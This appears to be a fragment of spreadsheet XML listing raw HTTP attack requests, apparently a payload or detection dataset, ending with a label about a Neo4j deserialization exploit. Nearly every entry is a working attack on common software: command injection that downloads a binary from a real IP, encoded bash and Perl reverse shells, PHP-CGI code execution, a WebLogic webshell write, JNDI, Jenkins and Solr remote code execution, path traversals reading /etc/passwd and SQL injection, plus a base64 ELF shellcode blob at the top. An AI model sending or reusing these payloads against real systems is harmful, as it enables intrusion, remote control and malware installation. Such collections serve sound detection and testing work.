X-Tgwe: f0VMRgIBAQAAAAAAAAAAAAIAPgABAAAAeABAAAAAAABAAAAAAAAAAAAAAAAAAAAAAAAAAEAAOAABAAAAAAAAAAEAAAAHAAAAAAAAAAAAAAAAAEAAAAAAAAAAQAAAAAAA+gAAAAAAAAB8AQAAAAAAAAAQAAAAAAAASDH/aglYmbYQSInWTTHJaiJBWrIHDwVIhcB4UWoKQVlQailYmWoCX2oBXg8FSIXAeDtIl0i5AgARXMCo+IRRSInmahBaaipYDwVZSIXAeSVJ/8l0GFdqI1hqAGoFSInnSDH2DwVZWV9IhcB5x2o8WGoBXw8FXmp+Wg8FSIXAeO3/5g==
</t>
    <phoneticPr fontId="4" type="noConversion"/>
  </si>
  <si>
    <t xml:space="preserve">GET /public/index.php?s=/index/qrcode/download/url/L2V0Yy9wYXNzd2Q= HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36
Connection: close
Accept-Encoding: identity
</t>
    <phoneticPr fontId="4" type="noConversion"/>
  </si>
  <si>
    <t>POST /boaform/admin/formPing HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36
Connection: close
Content-Length: 75
Accept-Encoding: identity
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Pragma: no-cache
X-Requested-With: XMLHttpRequest
target_addr=;cd /tmp; rm -rf; wget http://51.254.23.227/bins/n;chmod 777 n;</t>
    <phoneticPr fontId="4" type="noConversion"/>
  </si>
  <si>
    <t>POST /service/extdirect HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36
Connection: close
Content-Length: 223
Accept-Encoding: identity
Content-Type: application/json
Nx-Anti-Csrf-Token: 0.3355471197376484
X-Nexus-Ui: true
X-Requested-With: XMLHttpRequest
{"action":"coreui_User","method":"update","data":[{"userId":"admin","version":"2","firstName":"admin","lastName":"User","email":"admin@example.org","status":"active","roles":["nxadmin$\\B{233*233}"]}],"type":"rpc","tid":11}</t>
    <phoneticPr fontId="4" type="noConversion"/>
  </si>
  <si>
    <t xml:space="preserve">GET /taocms-3.0.2/admin/admin.php?action=file&amp;ctrl=del&amp;path=data/install.lock HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Connection: close
Accept-Encoding: identity
</t>
    <phoneticPr fontId="4" type="noConversion"/>
  </si>
  <si>
    <t xml:space="preserve">GET /vulnerabilities/sqli_blind/?id=1%29%3BCALL%20REGEXP_SUBSTRING%28REPEAT%28RIGHT%28CHAR%285158%29%2C0%29%2C500000000%29%2CNULL%29--&amp;Submit=Submit HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Connection: close
Accept-Encoding: identity
</t>
    <phoneticPr fontId="4" type="noConversion"/>
  </si>
  <si>
    <t xml:space="preserve">GET /%25u0073%25u0071%25u004c%25u0053%25u0065%25u0072%25u0076%25u0065%25u0072/%25u0053%25u0065%25u0041%25u0072%25u0063%25u0048/%25u0073%25u0045%25u0061%25u0072%25u0063%25u0068.%25u0041%25u0073%25u0050?%u006e%u0061%u006d%u0065=%u0031%u0027+%u0075%u004e%u0069%u006f%u004e+%u0053%u0065%u006c%u0045%u0063%u0054+%u0031%u002c%u0032%u002c%u0033+%u002d%u002d+ HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36
Connection: close
Accept-Encoding: identity
</t>
    <phoneticPr fontId="4" type="noConversion"/>
  </si>
  <si>
    <t xml:space="preserve">GET /mobile/DBconfigReader.jsp HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Connection: close
Accept-Encoding: identity
</t>
    <phoneticPr fontId="4" type="noConversion"/>
  </si>
  <si>
    <t xml:space="preserve">GET /vulnerabilities/sqli_blind/?id=1%29%3BCALL%20REGEXP_SUBSTRING%28REPEAT%28LEFT%28CRYPT_KEY%28CHAR%2865%29%7C%7CCHAR%2869%29%7C%7CCHAR%2883%29%2CNULL%29%2C0%29%2C500000000%29%2CNULL%29--&amp;Submit=Submit HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36
Connection: close
Accept-Encoding: identity
</t>
    <phoneticPr fontId="4" type="noConversion"/>
  </si>
  <si>
    <t>POST /jsrpc.php?output=json-rpc HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36
Connection: close
Content-Length: 112
Accept-Encoding: identity
Content-Type: application/json-rpc
X-Prototype-Version: 1.6.1
X-Requested-With: XMLHttpRequest
{"jsonrpc": "2.0", "method": "zabbix.status", "params": {}, "auth": "8ab3489dcced2ac4573fee2fdedc58c0", "id": 3}</t>
    <phoneticPr fontId="4" type="noConversion"/>
  </si>
  <si>
    <t xml:space="preserve">GET /?id=2;SELECT%201%20AS%20%22\%27]%3D0%3Brequire%3Dprocess.mainModule.constructor._load%3B%2F*%22%2C%202%20AS%20%22*%2Fp%3Drequire(`child_process`)%3B%2F*%22%2C%203%20AS%20%22*%2Fp.exec(`echo%20YmFzaCAtaSA%2BJiAvZGV2L3Rj`%2B%2F*%22%2C%204%20AS%20%22*%2F`cC8xOTIuMTY4Ljc1LjE1MC85OTk5IDA%2BJjE%3D|base64%20-d|bash`)%2F%2F%22 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36
Connection: close
Accept-Encoding: identity
</t>
    <phoneticPr fontId="4" type="noConversion"/>
  </si>
  <si>
    <t xml:space="preserve">GET /cgi-bin/downloadFlile.cgi?payload=`ls&gt;../1.txt` HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Connection: close
Accept-Encoding: identity
</t>
    <phoneticPr fontId="4" type="noConversion"/>
  </si>
  <si>
    <t xml:space="preserve">GET / HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36
Connection: close
Accept-Encoding: identity
Cookie: rememberMe=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
</t>
    <phoneticPr fontId="4" type="noConversion"/>
  </si>
  <si>
    <t>POST /?-%64+allow_url_include%3dTrue+--define+safe_mode%3dfaLse+-%64+suhosin.simulation%3don+--define+disable_functions%3d%22%22+-d+open_basedir%3dnone+-%64+auto_prepend_file%3dphp://input+--define+cgi.force_redirect%3dOFf+--define+cgi.redirect_status_env%3d0+--no-php-ini HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Connection: close
Content-Length: 236
Accept-Encoding: identity
Content-Type: application/x-www-form-urlencoded
&lt;?php system(base64_decode('cGVybCAtTUlPIC1lICckcD1mb3JrKCk7ZXhpdCxpZiRwOyRjPW5ldyBJTzo6U29ja2V0OjpJTkVUKExvY2FsUG9ydCw0NDQ0LFJldXNlLDEsTGlzdGVuKS0+YWNjZXB0OyR+LT5mZG9wZW4oJGMsdyk7U1RESU4tPmZkb3BlbigkYyxyKTtzeXN0ZW0kXyB3aGlsZTw+Jw=='));</t>
    <phoneticPr fontId="4" type="noConversion"/>
  </si>
  <si>
    <t>POST /RPC2 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Connection: close
Content-Length: 303
Accept-Encoding: identity
Content-Type: text/xml
&lt;?xml version="1.0"?&gt;
&lt;methodCall&gt;
  &lt;methodName&gt;supervisor.supervisord.options.warnings.linecache.os.system&lt;/methodName&gt;
  &lt;params&gt;
    &lt;param&gt;
      &lt;string&gt;echo -n cm0gLWYgJy90bXAvV0VHYXAuYjY0Jw==|base64 -d|nohup bash &gt; /dev/null 2&gt;&amp;amp;1 &amp;amp;&lt;/string&gt;
    &lt;/param&gt;
  &lt;/params&gt;
&lt;/methodCall&gt;</t>
    <phoneticPr fontId="4" type="noConversion"/>
  </si>
  <si>
    <t xml:space="preserve">POST /?-d+allow_url_include%3don+-d+safe_mode%3dofF+--define+suhosin.simulation%3doN+-%64+disable_functions%3d%22%22+--define+open_basedir%3dnone+--define+auto_prepend_file%3dphp://input+-%64+cgi.force_redirect%3dfALSE+--define+cgi.redirect_status_env%3d0+--no-php-ini HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Connection: close
Content-Length: 1925
Accept-Encoding: identity
Content-Type: application/x-www-form-urlencoded
&lt;?php /*&lt;?php /**/      @error_reporting(0);      @set_time_limit(0); @ignore_user_abort(1); @ini_set('max_execution_time',0);      $ZxPDVY=@ini_get('disable_functions');      if(!empty($ZxPDVY)){        $ZxPDVY=preg_replace('/[, ]+/', ',', $ZxPDVY);        $ZxPDVY=explode(',', $ZxPDVY);        $ZxPDVY=array_map('trim', $ZxPDVY);      }else{        $ZxPDVY=array();      }      $c = base64_decode('cGVybCAtTUlPIC1lICckcD1mb3JrO2V4aXQsaWYoJHApOyRjPW5ldyBJTzo6U29ja2V0OjpJTkVUKFBlZXJBZGRyLCIxOTIuMTY4LjI0OC4xMzI6NDQ0NCIpO1NURElOLT5mZG9wZW4oJGMscik7JH4tPmZkb3BlbigkYyx3KTtzeXN0ZW0kXyB3aGlsZTw+Oyc=');      if (FALSE !== strpos(strtolower(PHP_OS), 'win' )) {        $c=$c." 2&gt;&amp;1\n";      }      $jRxxFrY='is_callable';      $VdAn='in_array';            if($jRxxFrY('passthru')and!$VdAn('passthru',$ZxPDVY)){        ob_start();        passthru($c);        $leaCHw=ob_get_contents();        ob_end_clean();      }else      if($jRxxFrY('system')and!$VdAn('system',$ZxPDVY)){        ob_start();        system($c);        $leaCHw=ob_get_contents();        ob_end_clean();      }else      if($jRxxFrY('shell_exec')and!$VdAn('shell_exec',$ZxPDVY)){        $leaCHw=shell_exec($c);      }else      if($jRxxFrY('exec')and!$VdAn('exec',$ZxPDVY)){        $leaCHw=array();        exec($c,$leaCHw);        $leaCHw=join(chr(10),$leaCHw).chr(10);      }else      if($jRxxFrY('proc_open')and!$VdAn('proc_open',$ZxPDVY)){        $handle=proc_open($c,array(array('pipe','r'),array('pipe','w'),array('pipe','w')),$pipes);        $leaCHw=NULL;        while(!feof($pipes[1])){          $leaCHw.=fread($pipes[1],1024);        }        @proc_close($handle);      }else      if($jRxxFrY('popen')and!$VdAn('popen',$ZxPDVY)){        $fp=popen($c,'r');        $leaCHw=NULL;        if(is_resource($fp)){          while(!feof($fp)){            $leaCHw.=fread($fp,1024);          }        }        @pclose($fp);      }else      {        $leaCHw=0;      }    </t>
    <phoneticPr fontId="4" type="noConversion"/>
  </si>
  <si>
    <t xml:space="preserve">GET /solr/admin/cores?indexInfo=false&amp;wt=json HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Accept-Encoding: identity
</t>
    <phoneticPr fontId="4" type="noConversion"/>
  </si>
  <si>
    <t>POST /service/rest/beta/repositories/go/group HTTP/1.1
User-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36
Connection: close
Content-Length: 203
Accept-Encoding: identity
Content-Type: application/json
Nx-Anti-Csrf-Token: 90f7407e-78bc-4803-b5a1-13d3aea66e9e
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
X-Nexus-Ui: true
X-Requested-With: XMLHttpRequest
{
  "name": "internal",
  "online": true,
  "storage": {
    "blobStoreName": "default",
    "strictContentTypeValidation": true
  },
  "group": {
    "memberNames": ["$\\A{233*233*233}"]
  }
}</t>
    <phoneticPr fontId="4" type="noConversion"/>
  </si>
  <si>
    <t xml:space="preserve">GET /api/console/api_server?sense_version=%40%40SENSE_VERSION&amp;apis=../../../../../../../../../../../etc/passwd HTTP/1.1
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36
Connection: close
Accept-Encoding: identity
</t>
    <phoneticPr fontId="4" type="noConversion"/>
  </si>
  <si>
    <t>POST /solr/demo/config HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36
Connection: close
Content-Length: 259
Accept-Encoding: identity
Content-Type: application/json
{
  "update-queryresponsewriter": {
    "startup": "lazy",
    "name": "velocity",
    "class": "solr.VelocityResponseWriter",
    "template.base.dir": "",
    "solr.resource.loader.enabled": "true",
    "params.resource.loader.enabled": "true"
  }
}</t>
    <phoneticPr fontId="4" type="noConversion"/>
  </si>
  <si>
    <t xml:space="preserve">GET /..%2Fconf/config.properties HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Accept-Encoding: identity
</t>
    <phoneticPr fontId="4" type="noConversion"/>
  </si>
  <si>
    <t>POST /ruleinfo HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36
Connection: close
Content-Length: 180
Accept-Encoding: identity
Content-Type: application/x-www-form-urlencoded
!!org.apache.commons.configuration2.ConfigurationMap [!!org.apache.commons.configuration2.JNDIConfiguration [!!javax.naming.InitialContext [], "ldap://192.168.3.104:1389/Exploit"]]</t>
    <phoneticPr fontId="4" type="noConversion"/>
  </si>
  <si>
    <t xml:space="preserve">GET /%73%71%4c%53%65%72%76%65%72/%53%65%41%72%63%48/%73%45%61%72%63%68.%41%73%50?%6e%61%6d%65=%31%20%75%4e%69%6f%4e%20%53%65%6c%45%63%54%20%31%2c%32%2c%33%20%2d%2d%20 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36
Connection: close
Accept-Encoding: identity
</t>
    <phoneticPr fontId="4" type="noConversion"/>
  </si>
  <si>
    <t>POST /boaform/admin/formPing HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36
Connection: close
Content-Length: 75
Accept-Encoding: identity
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Pragma: no-cache
X-Requested-With: XMLHttpRequest
target_addr=;cd /tmp; rm -rf; wget http://51.254.23.227/bins/n;chmod 777 n;</t>
    <phoneticPr fontId="4" type="noConversion"/>
  </si>
  <si>
    <t xml:space="preserve">GET /apply.cgi?current_page=Main_AdmStatus_Content.asp&amp;next_page=Main_AdmStatus_Content.asp&amp;next_host&amp;sid_list=FirewallConfig%3B&amp;group_id&amp;modified=0&amp;action_mode=+Refresh+&amp;first_time&amp;action_script&amp;preferred_lang=EN&amp;SystemCmd=touch%20/tmp/pwned&amp;action=Refresh HTTP/1.1
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36
Connection: close
Accept-Encoding: identity
</t>
    <phoneticPr fontId="4" type="noConversion"/>
  </si>
  <si>
    <t>POST /wls-wsat/CoordinatorPortType HTTP/1.1
User-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36
Connection: close
Content-Length: 644
Accept-Encoding: identity
Content-Type: text/xml
&lt;soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"&gt;
    &lt;soapenv:Header&gt;
    &lt;work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"&gt;
    &lt;java&gt;&lt;java version="1.4.0" class="java.beans.XMLDecoder"&gt;
    &lt;object class="java.io.PrintWriter"&gt; 
    &lt;string&gt;servers/AdminServer/tmp/_WL_internal/bea_wls_internal/9j4dqk/war/test.jsp&lt;/string&gt;
    &lt;void method="println"&gt;
&lt;string&gt;
    &lt;![CDATA[
&lt;% out.print("webshell"); %&gt;
    ]]&gt;
    &lt;/string&gt;
    &lt;/void&gt;
    &lt;void method="close"/&gt;
    &lt;/object&gt;&lt;/java&gt;&lt;/java&gt;
    &lt;/work:WorkContext&gt;
    &lt;/soapenv:Header&gt;
    &lt;soapenv:Body/&gt;
&lt;/soapenv:Envelope&gt;</t>
    <phoneticPr fontId="4" type="noConversion"/>
  </si>
  <si>
    <t xml:space="preserve">GET /securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.workflow.cps.CpsFlowDefinition/checkScriptCompile?value=%40GrabConfig%28disableChecksums%3dtrue%29%0a%40GrabResolver%28%27http%3a//10.8.51.239%3a8080%27%29%0a%40Grab%28%27GrantLLC%3aTranscof%3a7.7.2%27%29%0aimport%20Transcof HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36
Connection: close
Accept-Encoding: identity
Content-Type: application/x-www-form-urlencoded
</t>
    <phoneticPr fontId="4" type="noConversion"/>
  </si>
  <si>
    <t>POST /solr/test/dataimport?_=1565835261600&amp;indent=on&amp;wt=json HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Connection: close
Content-Length: 679
Accept-Encoding: identity
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
command=full-import&amp;verbose=false&amp;clean=false&amp;commit=true&amp;debug=true&amp;core=test&amp;dataConfig=%3CdataConfig%3E%0A++%3CdataSource+type%3D%22URLDataSource%22%2F%3E%0A++%3Cscript%3E%3C!%5BCDATA%5B%0A++++++++++function+poc()%7B+java.lang.Runtime.getRuntime().exec(%22touch+%2Ftmp%2Fsuccess%22)%3B%0A++++++++++%7D%0A++%5D%5D%3E%3C%2Fscript%3E%0A++%3Cdocument%3E%0A++++%3Centity+name%3D%22stackoverflow%22%0A++++++++++++url%3D%22https%3A%2F%2Fstackoverflow.com%2Ffeeds%2Ftag%2Fsolr%22%0A++++++++++++processor%3D%22XPathEntityProcessor%22%0A++++++++++++forEach%3D%22%2Ffeed%22%0A++++++++++++transformer%3D%22script%3Apoc%22+%2F%3E%0A++%3C%2Fdocument%3E%0A%3C%2FdataConfig%3E&amp;name=dataimport</t>
    <phoneticPr fontId="4" type="noConversion"/>
  </si>
  <si>
    <t xml:space="preserve">GET /static/../../../a/../../../../etc/passwd HTTP/1.1
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36
Connection: close
Accept-Encoding: identity
If-None-Match: W/"1f8-A9naZm3yu+VHL0CdBLtDGuvxxYs"
</t>
    <phoneticPr fontId="4" type="noConversion"/>
  </si>
  <si>
    <t xml:space="preserve">GET /api/geojson?url=file:////etc/passwd HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
Connection: close
Accept-Encoding: identity
</t>
    <phoneticPr fontId="4" type="noConversion"/>
  </si>
  <si>
    <t xml:space="preserve">GET /nacos/v1/auth/users?pageNo=1&amp;pageSize=9 HTTP/1.1
User-Agent: Nacos-Server
Connection: close
Accept-Encoding: identity
</t>
    <phoneticPr fontId="4" type="noConversion"/>
  </si>
  <si>
    <t xml:space="preserve">POST /wp-admin/admin-ajax.php HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36
Connection: close
Content-Length: 76
Accept-Encoding: identity
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
action=rm_login_social_user&amp;email=admin%40localhost.org&amp;security=7c574ba56e </t>
    <phoneticPr fontId="4" type="noConversion"/>
  </si>
  <si>
    <t>POST /password_change.cgi HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
Connection: close
Content-Length: 60
Accept-Encoding: identity
DNT: 1
user=rootxx&amp;pam=&amp;expired=2&amp;old=test|id&amp;new1=test2&amp;new2=test2</t>
    <phoneticPr fontId="4" type="noConversion"/>
  </si>
  <si>
    <t>Neo4j Shell Server 反序列化漏洞利用</t>
